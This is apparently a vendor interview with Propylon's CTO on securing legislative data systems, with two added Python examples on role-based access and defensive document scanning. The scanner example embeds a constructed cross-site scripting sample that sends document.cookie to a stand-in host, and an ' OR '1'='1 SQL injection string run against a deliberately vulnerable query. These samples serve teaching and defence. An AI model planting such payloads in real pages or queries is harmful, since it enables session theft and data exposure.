Legislative Q&A: Cybersecurity with Greg Chapple, CTO

At the heart of every legislature is the staff ensuring its smooth running. In this Legislative Q&A series, we’re talking to legislative experts and staff about their journey to the legislature, shining a light on the working lives at the heart of American law-making. In the latest instalment, we spoke with Greg Chapple, Propylon CTO. With an increase in cyberattacks in recent years, Greg fills us in on the controls individuals and businesses can implement to ensure data is protected. Alongside playbooks and strategies for protecting against attacks, we discuss the cloud and the security of cloud data.

1. Greg, welcome to our Legislative Q&A. What are some common data security challenges? What measures can businesses implement at an individual as well as at an organizational level?

The biggest challenge I’ve encountered is maintaining a picture of where your data is, and who has access to it at any given time. This is especially challenging in document-centric systems such as legislative management systems where data is frequently represented to consumers in a very portable manner – e.g. downloadable, printable documents.

As an individual, it’s the simple things that make a big difference. When working with data that may be considered private, sensitive, or confidential – consider how others might try to gain access to that data. Being conscious of the following will go a long way to ensuring data is protected:
  • Be aware of who can see your screen when you are working. Is it possible for someone to look over your shoulder and see what you are doing?
  • If working in a public space, don’t use open Wi-Fi networks as these can be used to intercept data without you even realizing.
  • When you walk away from your PC, lock your screen to make sure someone can’t access what you were working on when you’re not in the room.
  • Ensure you have a strong password on your PC to dissuade someone from trying to force their way into your account.
  • Periodically review what files you have stored on your PC and remove any that you don’t need immediate access to, and instead, store them in your organization’s central document management system as appropriate.

As an organization, it is important to correctly label and classify data according to its level of sensitivity, and ensure appropriate access controls are in place for each label or level. For instance, access to confidential data may be limited to those in a specific role or department, whereas access to public data can be much more open. Role-based access is a useful pattern for managing access to data and data functions according to criteria defined in relation to the underlying data classification.
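The pattern Greg describes, roles granted access according to the sensitivity label on each document, can be made concrete in a few dozen lines. The following is an added example written for this page, not Propylon or LWB 360 code. The labels, roles, operations and document identifiers are hypothetical; the point is that every decision checks both the role's clearance against the document's label and the specific operation (read, download, print, edit), and that the same policy can answer the question from Greg's first paragraph: who has access to this document right now?

```python
"""Label-based role access control. Added example for this page; not
Propylon/LWB 360 code. All labels, roles and documents are hypothetical."""
from dataclasses import dataclass
from enum import IntEnum


class Label(IntEnum):
    """Ordered sensitivity levels: a higher level dominates a lower one."""
    PUBLIC = 0
    INTERNAL = 1
    CONFIDENTIAL = 2


@dataclass(frozen=True)
class Role:
    name: str
    clearance: Label            # highest label this role may touch
    operations: frozenset       # data functions this role may perform


@dataclass(frozen=True)
class Document:
    doc_id: str
    label: Label


# Hypothetical role definitions. Download and print are granted sparingly:
# every portable copy is a place the organisation must keep track of.
ROLES = {
    "public":  Role("public",  Label.PUBLIC,       frozenset({"read"})),
    "clerk":   Role("clerk",   Label.INTERNAL,     frozenset({"read", "download"})),
    "drafter": Role("drafter", Label.CONFIDENTIAL, frozenset({"read", "download", "print", "edit"})),
    "auditor": Role("auditor", Label.CONFIDENTIAL, frozenset({"read"})),
}


def is_allowed(role_name: str, operation: str, doc: Document) -> bool:
    """Deny unless the role exists, its clearance dominates the document's
    label, and the operation is one the role is permitted to perform."""
    role = ROLES.get(role_name)
    if role is None:
        return False                      # unknown role: deny by default
    if role.clearance < doc.label:
        return False                      # label not dominated by clearance
    return operation in role.operations


def roles_with_access(doc: Document, operation: str) -> list:
    """Answer 'who can perform this operation on this document?' from the
    same policy, so the access picture and the enforcement never diverge."""
    return sorted(name for name in ROLES if is_allowed(name, operation, doc))


def decision_log_line(user: str, role_name: str, operation: str, doc: Document) -> str:
    """Format one audit record; log every decision, denials included."""
    verdict = "ALLOW" if is_allowed(role_name, operation, doc) else "DENY"
    return (f"{verdict} user={user} role={role_name} op={operation} "
            f"doc={doc.doc_id} label={doc.label.name}")


if __name__ == "__main__":
    draft = Document("HB-0001-draft", Label.CONFIDENTIAL)
    print(decision_log_line("jsmith", "clerk", "download", draft))
    print("can download draft:", roles_with_access(draft, "download"))
```

Two design choices are worth calling out: the default is deny (an unknown role or a missing operation never grants access), and the "who has access" query is derived from the enforcement function rather than maintained as a separate list, so the inventory of access Greg mentions cannot drift from what the system actually enforces.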

2. What kind of attacks can legislative systems be vulnerable to?

Since legislative systems contain a broad range of data types and application interfaces, there are a number of scenarios here.

The two largest relevant categories are perhaps embedded content attacks and web-based attacks.

Content-based attacks involve malicious actors injecting content into documents stored in the legislative system. The injected content might be a script, a virus, or malformed content designed to cause errors in applications processing the content.

Web-based attacks include common scenarios like cross-site scripting, injection attacks, denial-of-service attacks, and more.
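The two categories in this answer, content injected into stored documents and web-based attacks on the application around them, can be illustrated together with the checks a document-centric system would apply at its boundaries. The following is an added example for this page, not Propylon or LWB 360 code, and the markup, bill numbers and size/nesting limits in it are constructed for illustration. It uses only the Python standard library: `scan_document` walks an HTML/XHTML fragment and reports active content (script elements, `on*` event handlers, `javascript:` URIs) and pathological nesting of the kind that crashes recursive processors; `render_excerpt` shows the complementary defence against stored or reflected cross-site scripting, escaping untrusted text before it is placed in a page; and the two `find_bill` functions put a string-formatted query beside its parameterised replacement so the injection payload can be seen succeeding against one and failing against the other.

```python
"""Boundary checks for document content and web input. Added example for
this page; not Propylon/LWB 360 code. Limits and sample data are constructed."""
import html
import sqlite3
from html.parser import HTMLParser

MAX_DOCUMENT_BYTES = 5 * 1024 * 1024   # hypothetical upload cap
MAX_NESTING_DEPTH = 200                # hypothetical structural limit
ACTIVE_ELEMENTS = {"script", "object", "embed", "iframe"}
URI_ATTRS = {"href", "src", "action", "formaction"}
SCRIPT_SCHEMES = {"javascript", "vbscript"}
VOID_ELEMENTS = {"area", "base", "br", "col", "embed", "hr", "img", "input",
                 "link", "meta", "param", "source", "track", "wbr"}


class ActiveContentScanner(HTMLParser):
    """Collects findings about active content and tracks element nesting."""

    def __init__(self):
        super().__init__()          # html.parser decodes entities and lowercases names
        self.findings = []
        self.depth = 0
        self.max_depth = 0

    def handle_starttag(self, tag, attrs):
        if tag not in VOID_ELEMENTS:
            self.depth += 1
            self.max_depth = max(self.max_depth, self.depth)
        if tag in ACTIVE_ELEMENTS:
            self.findings.append(f"active element <{tag}>")
        for name, value in attrs:
            if name.startswith("on"):
                self.findings.append(f"event handler {name} on <{tag}>")
            elif name in URI_ATTRS and value:
                # Browsers ignore whitespace/control characters inside the scheme,
                # so strip them before comparing ("java\tscript:" is still javascript).
                raw_scheme = value.split(":", 1)[0]
                scheme = "".join(ch for ch in raw_scheme if ord(ch) > 32).lower()
                if scheme in SCRIPT_SCHEMES:
                    self.findings.append(f"{scheme}: URI in {name} on <{tag}>")

    def handle_endtag(self, tag):
        if tag not in VOID_ELEMENTS:
            self.depth = max(0, self.depth - 1)


def scan_document(content: str) -> list:
    """Return the reasons to reject an uploaded document fragment (empty = clean)."""
    if len(content.encode("utf-8")) > MAX_DOCUMENT_BYTES:
        return ["document exceeds size limit"]       # reject before parsing at all
    scanner = ActiveContentScanner()
    scanner.feed(content)
    scanner.close()
    findings = list(scanner.findings)
    if scanner.max_depth > MAX_NESTING_DEPTH:
        findings.append(f"element nesting depth {scanner.max_depth} exceeds {MAX_NESTING_DEPTH}")
    return findings


def render_excerpt(title: str, body_text: str) -> str:
    """Place untrusted text in HTML by escaping it, never by raw concatenation."""
    return (f"<article><h2>{html.escape(title)}</h2>"
            f"<p>{html.escape(body_text)}</p></article>")


def setup_bills() -> sqlite3.Connection:
    """Constructed in-memory bill table for the injection comparison."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE bills (number TEXT, title TEXT, status TEXT)")
    conn.executemany("INSERT INTO bills VALUES (?, ?, ?)", [
        ("HB-101", "Example appropriations act", "introduced"),
        ("HB-102", "Example transport act", "enrolled"),
    ])
    return conn


def find_bill_unsafe(conn, number: str) -> list:
    """Vulnerable: the lookup value is pasted into the SQL text."""
    return conn.execute(f"SELECT number FROM bills WHERE number = '{number}'").fetchall()


def find_bill(conn, number: str) -> list:
    """Hardened: a bound parameter is data, never parsed as SQL."""
    return conn.execute("SELECT number FROM bills WHERE number = ?", (number,)).fetchall()


# Constructed example of a hostile "bill text" upload.
SAMPLE_UPLOAD = (
    "<section><h1>HB-101</h1>"
    "<p onmouseover=\"fetch('//x/?c='+document.cookie)\">Section 1.</p>"
    "<a href=\"JavaScript:alert(1)\">Read more</a>"
    "<script>document.location='//x/'</script></section>"
)

if __name__ == "__main__":
    for finding in scan_document(SAMPLE_UPLOAD):
        print("reject:", finding)
    conn = setup_bills()
    payload = "' OR '1'='1"
    print("unsafe:", find_bill_unsafe(conn, payload), "safe:", find_bill(conn, payload))
```

The scanner is a detection aid, not a full sanitiser: a production system should also run uploaded files through antivirus scanning for the "virus" case in the answer, and the size and depth limits here stand in for whatever limits the real document processor can tolerate. The escaping and parameterisation are the lasting fixes for the web side; detection of hostile input is the layer in front of them, not a substitute.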

3. State-sponsored cyber-attacks are increasing. What do you think are the biggest future challenges?

I think the biggest challenge will be scaling your security function to a level where you can keep on top of the ever-growing and ever-changing security landscape. The list of possible attacks, the list of known vulnerabilities, only grows larger. Keeping on top of this becomes harder and harder, and unless you have the desire to invest significantly in your security function within the organization, to either build or hire the required skills and expertise at the level required to stay safe, you’ll be at risk.

4. What kind of playbooks and strategies can states implement to protect against attacks? Are there long-term and short-term solutions?

Implementing processes and tools from security standards (e.g. NIST, SOC 2, ISO 27001, etc.) is a great long-term strategy. One of the core principles in any of those standards is to establish an ongoing security management system – it becomes part of how you do business. It takes time to implement the various policies and procedures under any of those standards, but it is well worth the investment. Short-term wins can be found in evaluating and reviewing the basics – access controls, password management, device management, etc. Take some time to review the current state of those items and clean up any anomalies.

5. Why is it important to keep systems current?

Any given system is made up of many individual components, libraries, and packages. Any of these elements can be vulnerable to attacks in a variety of ways. Keeping systems up to date means keeping all component parts up to date to ensure any attack surface within your organization is minimized as much as possible, and that your organization’s data and resources are protected.

6. Let’s talk about the cloud. How secure is cloud data? How does it work at a high level?

In many ways, cloud data is more secure than the alternatives. Modern cloud data centers are subject to massive amounts of regulation with respect to security and privacy, and cloud providers have invested millions in ensuring they are compliant – far more than any individual business could invest.

At a high level, when you provision cloud infrastructure, your cloud vendor allocates the relevant virtual infrastructure within the relevant data center(s). The virtual infrastructure is provisioned according to your specifications and should fall into your own IT management processes. The underlying hardware is managed by the cloud provider, including the data center management and security. The cloud vendor ensures the virtual infrastructure you’ve created is completely isolated from any other customer systems, meaning you have total privacy within your new cloud environment.

All cloud providers offer industry-standard encryption and security tools to help further secure your data and related systems.

7. What is a managed service and what does a managed services provider (MSP) do? What are some benefits of working with an MSP?

A managed service provider takes on the management and maintenance of a given service on behalf of a customer. MSPs can help fill staff shortages, provide expertise, provide business continuity, and improve security and cost efficiency.

The LWB 360® Managed Service is a great example of this. We offer fully managed instances of our LWB 360 software, meaning our customers can benefit from our best-in-class legislative management solutions without the burden of the management and maintenance of the underlying infrastructure. This frees up valuable legislative IT staff time to focus on supporting the legislature in the day-to-day operations and still benefit from Propylon’s expertise in managing these systems in a secure, highly available and cost-effective environment.